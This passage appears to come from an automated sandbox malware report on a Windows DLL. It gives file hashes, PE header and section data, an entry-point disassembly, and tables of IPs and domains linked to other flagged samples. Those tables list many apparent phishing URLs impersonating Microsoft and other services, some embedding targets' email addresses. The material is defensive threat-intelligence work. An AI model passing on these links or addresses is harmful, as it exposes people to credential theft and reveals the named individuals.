                                                                                52.97.201.242http://resa.credit-financebank.com/donc/dcn/?email=bWNnaW5udEByZXNhLm5ldA==Get hashmaliciousBrowse
                                                                                  40.97.128.194http://outlook.com/owa/airmasteraustralia.onmicrosoft.comGet hashmaliciousBrowse
                                                                                  • outlook.com/owa/airmasteraustralia.onmicrosoft.com
                                                                                  52.97.232.194c36.dllGet hashmaliciousBrowse
                                                                                    Signed pages of agreement copy.htmlGet hashmaliciousBrowse
                                                                                      http://YUEipfm.zackgillum.com/%40120%40240%40#james.kelsaw@puc.texas.govGet hashmaliciousBrowse
                                                                                        https://microsoft-quarantine.df.r.appspot.com/Get hashmaliciousBrowse
                                                                                          Fund Transfer PDF.htmGet hashmaliciousBrowse
                                                                                            http://portal.payrolltooling.net/?id=vpqyydl7ZnKtU4usMGPqUQPtxkGlU49Be%2BH%2BAigE5ucTWat3Eej8US2xdckdOu0iDpwQIwMYKl9DLP2pKOIwIWa7isWu4stPeMJ%2BbSSC%2BrsVtg8U%2BWD1tF4Bc3%2FtEr3hJI4S3OomSDlwnU2PwUDgbmdkRVrT8Jiy8Xe4bfQ0dyp5k2o%2Bf2eztEQzNsZlKz0xjWSRZcdjYCg9vWmNNNSvSwsWNybr8UBeONKYmj4PdCOwhNBWdvur%2BK4Wx1bqcPE26q7z8kpyQ4hJ2vOCvXmdlnZ37w0%2BAGvM3H2V03OaxIsBHrlCuyiPhQWq8qdKOB4lg1EmFibK759dnK%2FawF2z6INf5IJhbtrbLVkWA6i%2FuckBPOJvVXHWYj5SHhB8X%2FZzGet hashmaliciousBrowse
                                                                                              P.I Officewears 28.07.2020.exeGet hashmaliciousBrowse
                                                                                                http://wcladr.atoo.xyz/%407499%401289%40#rhys.hodge@2sfg.comGet hashmaliciousBrowse
                                                                                                  https://angularjs-xcyejc.stackblitz.io/Get hashmaliciousBrowse
                                                                                                    https://office365-0nedrive-portal.el.r.appspot.com/Get hashmaliciousBrowse
                                                                                                      https://austeamatic-my.sharepoint.com/:f:/g/personal/wspence_steamatic_com_au/ElyRIyMAVJtHn6FFuMTMYowBrq7r9BGosqf6VblEm4AzkA?e=S5Qh6cGet hashmaliciousBrowse
                                                                                                        https://xlelectricals.com/dolex/offices/index.phpGet hashmaliciousBrowse
                                                                                                          https://firebasestorage.googleapis.com/v0/b/j3q3d3sqsuuser.appspot.com/o/index.htm?alt=media&token=a6ff4f2d-2706-4fc4-bf56-5796926e37ef#cathyc@stockland.com.auGet hashmaliciousBrowse
                                                                                                            https://jetlow.z19.web.core.windows.net/#is@loreal.comGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              ZRH-efz.ms-acdc.office.comc36.dllGet hashmaliciousBrowse
                                                                                                              • 52.97.186.114
                                                                                                              c36.dllGet hashmaliciousBrowse
                                                                                                              • 52.98.163.18
                                                                                                              Signed pages of agreement copy.htmlGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              PI_DRAFT.exeGet hashmaliciousBrowse
                                                                                                              • 52.97.186.114
                                                                                                              moog_invoice_Wednesday 02242021._xslx.hTMLGet hashmaliciousBrowse
                                                                                                              • 52.97.201.210
                                                                                                              https://app.box.com/s/yihmp2wywbz9lgdbg26g3tc1piwkalabGet hashmaliciousBrowse
                                                                                                              • 52.97.232.210
                                                                                                              http://resa.credit-financebank.com/donc/dcn/?email=bWNnaW5udEByZXNhLm5ldA==Get hashmaliciousBrowse
                                                                                                              • 52.97.201.242
                                                                                                              https://loginpro-288816.ew.r.appspot.com/#joshua.kwon@ttc.caGet hashmaliciousBrowse
                                                                                                              • 52.97.186.98
                                                                                                              http://YUEipfm.zackgillum.com/%40120%40240%40#james.kelsaw@puc.texas.govGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              https://microsoft-quarantine.df.r.appspot.com/Get hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              https://storage.googleapis.com/atotalled-370566990/index.htmlGet hashmaliciousBrowse
                                                                                                              • 52.97.186.18
                                                                                                              https://login-microsoft-office365-auth.el.r.appspot.com/login.microsoftonline.com/common/oauth2/authorize=vNews2&email=microsoftonline.com/common/oauth2/authorize&hashed_email=Y7XY6XCZJ3R4T4MN&utm_campaign=phx_trigger_uk_pop_email4&utm_source=photobox&utm_medium=email&uid=4978854645473&brandName=Photobox#helen@rhdb.com.auGet hashmaliciousBrowse
                                                                                                              • 52.97.232.242
                                                                                                              https://clicktime.symantec.com/3LNDmLN9vLnK1LqGUDBbkAD6H2?u=https%3A%2F%2Foutlook.office.com%2Fmail%2Fsearch%2Fid%2Fnscglobal.comGet hashmaliciousBrowse
                                                                                                              • 52.97.232.226
                                                                                                              https://luminous-cubist-288118.df.r.appspot.com/#lilja.b.einarsdottir@landsbankinn.isGet hashmaliciousBrowse
                                                                                                              • 52.97.232.226
                                                                                                              https://u4882271.ct.sendgrid.net/ls/click?upn=YFyCGXB2k7XEs51EAWvRp-2BQ6xaP5-2Bxv1vyI4sITyTp6VhtJSyiu7Ungt4CUf7KdGeEBPZ7lJ0WMtGrW3-2F8wXB5kIqpkSCZwccYVceognA2U-3D57Rw_kfZ8cLppmcXDuIHKWdMrLPt30SkBa8ipQz83IjjYGp9c2flQixqYXWN470AqCFO8g1yhSwMHhN8-2BJK0vTLNC61PkTeWIrAs821yYsBfCbuclR33OfNLncv-2FtXraICcEYo4WPVv8iupWN7r8K4Ld3UpsglQggrT98vACCXZNhqlBcQYKLRD-2BBljUb02MnMpFHKiH9-2BP5uH3bAOFC4VOgSpVi86N1p2cxRMZF5Xkh4ZdU-3DGet hashmaliciousBrowse
                                                                                                              • 52.97.186.114
                                                                                                              https://share-ointonlinekcjl5cj5k.et.r.appspot.com/#I.Artolli@sbm.mcGet hashmaliciousBrowse
                                                                                                              • 52.97.186.18
                                                                                                              Fund Transfer PDF.htmGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              http://outlook.com/owa/airmasteraustralia.onmicrosoft.comGet hashmaliciousBrowse
                                                                                                              • 52.97.232.226
                                                                                                              http://portal.payrolltooling.net/?id=vpqyydl7ZnKtU4usMGPqUQPtxkGlU49Be%2BH%2BAigE5ucTWat3Eej8US2xdckdOu0iDpwQIwMYKl9DLP2pKOIwIWa7isWu4stPeMJ%2BbSSC%2BrsVtg8U%2BWD1tF4Bc3%2FtEr3hJI4S3OomSDlwnU2PwUDgbmdkRVrT8Jiy8Xe4bfQ0dyp5k2o%2Bf2eztEQzNsZlKz0xjWSRZcdjYCg9vWmNNNSvSwsWNybr8UBeONKYmj4PdCOwhNBWdvur%2BK4Wx1bqcPE26q7z8kpyQ4hJ2vOCvXmdlnZ37w0%2BAGvM3H2V03OaxIsBHrlCuyiPhQWq8qdKOB4lg1EmFibK759dnK%2FawF2z6INf5IJhbtrbLVkWA6i%2FuckBPOJvVXHWYj5SHhB8X%2FZzGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              okayfreedomwr.exeGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              stats.l.doubleclick.net60e40fb428612.dllGet hashmaliciousBrowse
                                                                                                              • 142.250.102.155
                                                                                                              TestTakerSBBrowser.exeGet hashmaliciousBrowse
                                                                                                              • 74.125.133.155
                                                                                                              vNiyRd4GcH.exeGet hashmaliciousBrowse
                                                                                                              • 108.177.15.154
                                                                                                              sf0X1hMF0g.docGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              sf0X1hMF0g.docGet hashmaliciousBrowse
                                                                                                              • 74.125.140.155
                                                                                                              DocuSign-June-SOA-Dues.261.htmGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              XqnM8G36Ih.exeGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
                                                                                                              • 74.125.140.154
                                                                                                              Global _Transport NZ..xlsxGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              Global _Transport NZ..xlsxGet hashmaliciousBrowse
                                                                                                              • 74.125.140.156
                                                                                                              VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              HRXoZLG4ym.exeGet hashmaliciousBrowse
                                                                                                              • 74.125.140.155
                                                                                                              MacKeeper.5.4.pkgGet hashmaliciousBrowse
                                                                                                              • 142.250.27.154
                                                                                                              Hngx5CdG2D.exeGet hashmaliciousBrowse
                                                                                                              • 74.125.140.154
                                                                                                              5474_-_Test_Call_Procedure_4.2.docxGet hashmaliciousBrowse
                                                                                                              • 74.125.140.154
                                                                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                                                                              • 142.251.5.154
                                                                                                              crt9O3URua.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.102.154
                                                                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                                                                              • 142.250.102.157
                                                                                                              Ref#Doc30504871 Wyg.htmGet hashmaliciousBrowse
                                                                                                              • 173.194.76.156
                                                                                                              ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                                              • 74.125.140.157
                                                                                                              stivers-ricsovers.com609110f2d14a6.dllGet hashmaliciousBrowse
                                                                                                              • 18.195.174.160

                                                                                                              ASN

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSuLTvM5APNY.exeGet hashmaliciousBrowse
                                                                                                              • 104.47.54.36
                                                                                                              X7FqAeP3oE.exeGet hashmaliciousBrowse
                                                                                                              • 104.42.151.234
                                                                                                              8944848MNBV.exeGet hashmaliciousBrowse
                                                                                                              • 23.101.8.193
                                                                                                              5odgesjcMa.exeGet hashmaliciousBrowse
                                                                                                              • 168.61.161.212
                                                                                                              Horodlsjjdrxysbousfnmraroywkyeqrjq.exeGet hashmaliciousBrowse
                                                                                                              • 20.80.51.178
                                                                                                              Hond.exeGet hashmaliciousBrowse
                                                                                                              • 168.61.161.212
                                                                                                              6dCudgmxKY.exeGet hashmaliciousBrowse
                                                                                                              • 104.42.151.234
                                                                                                              SIeDLrXyLs.exeGet hashmaliciousBrowse
                                                                                                              • 20.194.35.6
                                                                                                              cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                                                              • 13.64.90.137
                                                                                                              codes.zip.exeGet hashmaliciousBrowse
                                                                                                              • 52.239.214.132
                                                                                                              Qyqcfpjnkpfztrximioqcwcfursbkeatda.exeGet hashmaliciousBrowse
                                                                                                              • 20.80.30.45
                                                                                                              HQZzLlAZjR.exeGet hashmaliciousBrowse
                                                                                                              • 20.151.200.9
                                                                                                              HQZzLlAZjR.exeGet hashmaliciousBrowse
                                                                                                              • 20.151.200.9
                                                                                                              31Ov8DqdkE.exeGet hashmaliciousBrowse
                                                                                                              • 157.56.161.162
                                                                                                              c36.dllGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              c36.dllGet hashmaliciousBrowse
                                                                                                              • 52.98.163.18
                                                                                                              2oxhsHaX3D.exeGet hashmaliciousBrowse
                                                                                                              • 13.107.4.50
                                                                                                              iKcDLx5Wxc.exeGet hashmaliciousBrowse
                                                                                                              • 104.43.139.144
                                                                                                              r6.zip.exeGet hashmaliciousBrowse
                                                                                                              • 52.239.214.132
                                                                                                              recovered_bin2Get hashmaliciousBrowse
                                                                                                              • 52.228.135.155
                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSuLTvM5APNY.exeGet hashmaliciousBrowse
                                                                                                              • 104.47.54.36
                                                                                                              X7FqAeP3oE.exeGet hashmaliciousBrowse
                                                                                                              • 104.42.151.234
                                                                                                              8944848MNBV.exeGet hashmaliciousBrowse
                                                                                                              • 23.101.8.193
                                                                                                              5odgesjcMa.exeGet hashmaliciousBrowse
                                                                                                              • 168.61.161.212
                                                                                                              Horodlsjjdrxysbousfnmraroywkyeqrjq.exeGet hashmaliciousBrowse
                                                                                                              • 20.80.51.178
                                                                                                              Hond.exeGet hashmaliciousBrowse
                                                                                                              • 168.61.161.212
                                                                                                              6dCudgmxKY.exeGet hashmaliciousBrowse
                                                                                                              • 104.42.151.234
                                                                                                              SIeDLrXyLs.exeGet hashmaliciousBrowse
                                                                                                              • 20.194.35.6
                                                                                                              cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                                                              • 13.64.90.137
                                                                                                              codes.zip.exeGet hashmaliciousBrowse
                                                                                                              • 52.239.214.132
                                                                                                              Qyqcfpjnkpfztrximioqcwcfursbkeatda.exeGet hashmaliciousBrowse
                                                                                                              • 20.80.30.45
                                                                                                              HQZzLlAZjR.exeGet hashmaliciousBrowse
                                                                                                              • 20.151.200.9
                                                                                                              HQZzLlAZjR.exeGet hashmaliciousBrowse
                                                                                                              • 20.151.200.9
                                                                                                              31Ov8DqdkE.exeGet hashmaliciousBrowse
                                                                                                              • 157.56.161.162
                                                                                                              c36.dllGet hashmaliciousBrowse
                                                                                                              • 52.97.232.194
                                                                                                              c36.dllGet hashmaliciousBrowse
                                                                                                              • 52.98.163.18
                                                                                                              2oxhsHaX3D.exeGet hashmaliciousBrowse
                                                                                                              • 13.107.4.50
                                                                                                              iKcDLx5Wxc.exeGet hashmaliciousBrowse
                                                                                                              • 104.43.139.144
                                                                                                              r6.zip.exeGet hashmaliciousBrowse
                                                                                                              • 52.239.214.132
                                                                                                              recovered_bin2Get hashmaliciousBrowse
                                                                                                              • 52.228.135.155

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7370D51F-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):50344
                                                                                                              Entropy (8bit):2.007817288091259
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:rZZeZu2TWetyf0NMPjPxPAYMP2TBVKAu4lIg:rPKFqewRPjPxPMP2TC4F
                                                                                                              MD5:72DFFC63D7B320FF56607CACBBF2D659
                                                                                                              SHA1:9694D0EF54C82CAC4D3C55740C7C9298B725FE31
                                                                                                              SHA-256:87260A3937BAA49E596D024895EE0EADC06DF10892C4CEFAEE87B8C557233A42
                                                                                                              SHA-512:B78566E638A0FA880AB105B031320A876761CDDE77F5F77762EA39FAB72C0354162E1CCEEE53864E89B37A097BA9F08E59D33C2F6AE288D6E235AA0F749E311A
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):27368
                                                                                                              Entropy (8bit):1.839005711968297
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:rWZtQd6jBSZjN2hWfMHigB96Juge/GxgB96Juge/g96ZA:rWZtQd6jkZjN2hWfMHigWlxgWuA
                                                                                                              MD5:6AB6BAE717B506BF99138EAD4712FD5D
                                                                                                              SHA1:D968B18FA142DFAD6808349EE20F52AABF8A46F5
                                                                                                              SHA-256:B60F5051287D0F98A62928ABBD2B25CA46E8FACC716BCD585C41CBE70447C925
                                                                                                              SHA-512:CD3011896E2A9477020EEA8AA7A7C3241FE51AB12F6C011F0068BAFF675CFF1A72D104631751416CAB5B4A24D297B2ADC156F94B5B30A911810AFCD132EE4F07
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:Microsoft Word Document
                                                                                                              Category:dropped
                                                                                                              Size (bytes):27436
                                                                                                              Entropy (8bit):1.8611245040893345
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:rKZtQZ67BSijh2FW4MW+8BszVMkMPx8BszVMkMwszFCA:rKZtQZ67kijh2FW4MW+8Wzsx8WzezFCA
                                                                                                              MD5:B45BE5E0689CA52E7AA317477CEAB2EB
                                                                                                              SHA1:0D308F7400E760E9053A8DC45D37FD4746C832A8
                                                                                                              SHA-256:C205717F2E113190755FCD2A714B8D891B4045EB9DB81ECB36868D55687B5033
                                                                                                              SHA-512:F3C842EA151F324A2E582FF32F71C8B9B6B2A202D6277F3BA389AD787E9199216849F8B86554B5918114E71F3A10148B87D8103A1114B058E420D34B3DDABE2E
                                                                                                              Malicious:false
                                                                                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):89
                                                                                                              Entropy (8bit):4.45974266689267
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:oVXUtJf0fBovpEH8JOGXnEtJf0fBovUSX+n:o9UtJsUiqEtJsUU7
                                                                                                              MD5:5AF30AB03EEB684130F909A48D6C87EC
                                                                                                              SHA1:E217A694B2C4E7EA04763EA6A99B9A577652016B
                                                                                                              SHA-256:A743A35C1772ECEAA2F22B3765935A911CA50A23156F04EFC4FBFCC42F8B9F1A
                                                                                                              SHA-512:2813B7FE1FF192128C97894DB317964A66FCB38B7E330EA6A07456BD73BD7FBDF432E9BAA4311FDE3FE0A147DB756EDC53F1C64830D10949FDAE14E38AD52A97
                                                                                                              Malicious:false
                                                                                                              Preview: [2021/07/14 15:47:24.961] Latest deploy version: ..[2021/07/14 15:47:24.961] 11.211.2 ..
                                                                                                              C:\Users\user\AppData\Local\Temp\~DF08C928D5E36F5DDB.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13237
                                                                                                              Entropy (8bit):0.5978024045945609
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:c9lLh9lLh9lIn9lIn9loMpF9loMr9lWMZofjBMjBMRyBMRTTTi:kBqoI7dhjBMjBMRyBMRvO
                                                                                                              MD5:288585C44B20EA24B2FD22E86C0AC593
                                                                                                              SHA1:D72E31BF7599CC277A793D645FECB07371B5E665
                                                                                                              SHA-256:DF52758571E4D35099BAA3057ACE9396DD2FEAA5D9B3EE51698BFF7531350701
                                                                                                              SHA-512:C277CDFDFDD901B86DAF202F718801A410E8B6B23FAFAF37282EDB242C8FFED45D31F59B77B899EB82AC0D8AC6464785A99CEAD24FADE5D13D29126DDC37B394
                                                                                                              Malicious:false
                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\~DF64A2AAB8E5E3DF4B.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):39769
                                                                                                              Entropy (8bit):0.5967894698585455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:kBqoxKAuvScS+AGcdGM8BszVMkMC8BszVMkMm8BszVMkM3:kBqoxKAuqR+AGcdGM8WzH8Wzn8Wzs
                                                                                                              MD5:2D85FE4AF6F5C992507FB76E7BDA0792
                                                                                                              SHA1:A279DE73D9632650F4D76CF2FF77FD69FAA6EE06
                                                                                                              SHA-256:90DCAC7CD40AD46F46C4EA799D12DA79C04C0D937AC1195862881314D51EC070
                                                                                                              SHA-512:9E0774C8B71744D0329ECC51355627F3E3B650A8DFDF22470BB1FA39A9A7C312CA637DA93F334FDF2DC4F639C81D0E649B34B0A89019FF2562DD5A7092660B92
                                                                                                              Malicious:false
                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\~DFEA5774EEA628D538.TMP
                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):39633
                                                                                                              Entropy (8bit):0.5703763819497271
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:kBqoxKAuvScS+Z3lUX9gB96Juge/egB96Juge/+gB96Juge/3:kBqoxKAuqR+Z3lUX9gW7gW/gWk
                                                                                                              MD5:438BF405E16CD9C0230E87A245B3986D
                                                                                                              SHA1:3E253609827B74E371E078EE26FEA1E73D6DE489
                                                                                                              SHA-256:E36EBB25504C9233020CB6BBD89F01773C287628FE0BDF189F387E1DCC59E330
                                                                                                              SHA-512:C2BD4B2756B618C0EC6EC5FF881461B78C4EDEEC420699559D3773E444DC5CCC74D80B046A1CDBF830FFCFAB62355A40019A6EDAE1C05E4D3620451ED16F9B5A
                                                                                                              Malicious:false
                                                                                                              Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.657188224349107
                                                                                                              TrID:
                                                                                                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                              • DOS Executable Generic (2002/1) 0.20%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:945.dll
                                                                                                              File size:381440
                                                                                                              MD5:9453981ab8e71981bea907b3f2d11395
                                                                                                              SHA1:ca0f69ef71bf287bdd19a8a9811c1f0dd2ff50e6
                                                                                                              SHA256:fa97cd35d76337ff4a523ebdd7f879359a70432a14b7377f06df29c4679b3f70
                                                                                                              SHA512:7c1dcf301adbda28a202f77d5898215ea7292ea3c1ccfa2bb8d2af97e417a1e11824c99c878694e972227d3f1038d63b5052d670b1aeb8226859a511245406c1
                                                                                                              SSDEEP:6144:vC8nRa6tXFOspzA736NZVeC8i795fubASK9beZTX3l8Eo:J0SVOspFVWi7PWoBeZTX36
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~@........................................D...................................................Rich............PE..L......S...

                                                                                                              File Icon

                                                                                                              Icon Hash:74f0e4ecccdce0e4

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x102cd58
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x1000000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x5396CBB2 [Tue Jun 10 09:11:14 2014 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:4c29865e356872ef0757b58734cbbb11

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              cmp dword ptr [ebp+0Ch], 01h
                                                                                                              jne 00007F9BC4E898A7h
                                                                                                              call 00007F9BC4E94A8Fh
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push dword ptr [ebp+0Ch]
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E898ACh
                                                                                                              add esp, 0Ch
                                                                                                              pop ebp
                                                                                                              retn 000Ch
                                                                                                              push 0000000Ch
                                                                                                              push 010591A8h
                                                                                                              call 00007F9BC4E8FDAEh
                                                                                                              xor eax, eax
                                                                                                              inc eax
                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                              test esi, esi
                                                                                                              jne 00007F9BC4E898AEh
                                                                                                              cmp dword ptr [010F11A4h], esi
                                                                                                              je 00007F9BC4E8998Ah
                                                                                                              and dword ptr [ebp-04h], 00000000h
                                                                                                              cmp esi, 01h
                                                                                                              je 00007F9BC4E898A7h
                                                                                                              cmp esi, 02h
                                                                                                              jne 00007F9BC4E898D7h
                                                                                                              mov ecx, dword ptr [01052870h]
                                                                                                              test ecx, ecx
                                                                                                              je 00007F9BC4E898AEh
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call ecx
                                                                                                              mov dword ptr [ebp-1Ch], eax
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E89957h
                                                                                                              push dword ptr [ebp+10h]
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E896B6h
                                                                                                              mov dword ptr [ebp-1Ch], eax
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E89940h
                                                                                                              mov ebx, dword ptr [ebp+10h]
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E7E268h
                                                                                                              mov edi, eax
                                                                                                              mov dword ptr [ebp-1Ch], edi
                                                                                                              cmp esi, 01h
                                                                                                              jne 00007F9BC4E898CAh
                                                                                                              test edi, edi
                                                                                                              jne 00007F9BC4E898C6h
                                                                                                              push ebx
                                                                                                              push eax
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E7E250h
                                                                                                              push ebx
                                                                                                              push edi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call 00007F9BC4E8967Ch
                                                                                                              mov eax, dword ptr [01052870h]
                                                                                                              test eax, eax
                                                                                                              je 00007F9BC4E898A9h
                                                                                                              push ebx
                                                                                                              push edi
                                                                                                              push dword ptr [ebp+08h]
                                                                                                              call eax

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [EXP] VS2013 UPD3 build 30723
                                                                                                              • [LNK] VS2013 UPD3 build 30723
                                                                                                              • [ C ] VS2013 build 21005
                                                                                                              • [C++] VS2013 build 21005
                                                                                                              • [ASM] VS2013 build 21005
                                                                                                              • [C++] VS2013 UPD3 build 30723
                                                                                                              • [RES] VS2013 build 21005
                                                                                                              • [IMP] VS2008 SP1 build 30729

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x597e00x80.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x598600x50.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x1e0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf50000x2b1c.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x442200x38.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x57c580x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x440000x18c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x4211f0x42200False0.619808896503data6.63192382314IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x440000x161720x16200False0.578919491525data5.90225736165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x5b0000x980ec0x1c00False0.316824776786data3.9217328811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xf40000x1e00x200False0.529296875data4.724728912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
